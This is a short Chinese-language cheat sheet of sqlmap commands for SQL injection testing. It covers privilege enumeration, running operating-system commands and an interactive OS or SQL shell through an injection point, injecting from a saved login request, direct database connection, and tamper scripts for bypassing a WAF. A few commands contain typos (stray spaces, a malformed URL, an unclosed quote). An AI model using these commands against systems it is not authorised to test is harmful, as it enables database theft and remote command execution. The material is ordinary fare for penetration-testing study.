1.测试注入点权限
sqlmap.py -u [URL] --privileges // 测试所有用户的权限
sqlmap.py -u [URL] -- privileges -U sa //测试sa用户权限
注:SQLmap命令区分大小写,-u和-U是两个参数
2.执行Shell命令
sqlmap.py -u [URL] --os-cmd="net user" //执行net user 命令
sqlmap.py -u [URL] --os-shell //系统交互的shell
3.获取当前数据库名称
sqlmap.py -u [URL] --current-db
4.执行SQL命令
sqlmap.py -u [URL] --sql-shell //返回SQL交互的shell,可以执行SQL语句
sqlmap.py -u [URL] --sql-query="sql"
5.POST提交方式
sqlmap.py -u [URL] --data "POST参数"
6.显示详细的等级
sqlmap.py -u [URL] --dbs -v 1
-v 参数包含以下7个等级:
·0:只显示Python的回溯、错误和关键信息;
·1:显示信息和警告信息;
·2:显示调试信息;
·3:有效载荷注入;
·4:显示HTTP请求;
·5:显示HTTP响应头;
·6:显示HTTP响应页面的内容。
7.注入HTTP请求
sqlmap.py -r head.txt --dbs //head.txt内容为HTTP请求
head.txt 内容如下:
POST /login.php HTTP/1.1
Host:www.secbug.org
User-Agent:Mozilla/5.0
username=admin&password=admin888
8.直接连接到数据库
sqlmap.py -d "mysql://admin:admin@192.168.1.8:3306/testab" --dbs
9.注入等级
sqlmap.py -u [URL] --level 3
10.将注入语句插入到指定位置
sqlmap.py -u "http:.//www.xxser.com/id/2*.html" --dbs
注:这一用法常用来伪静态注入。
11.使用SQLMap插件
sqlmap.py -u [URL] -tamper "space2morehash.py
注:常用来绕过WAF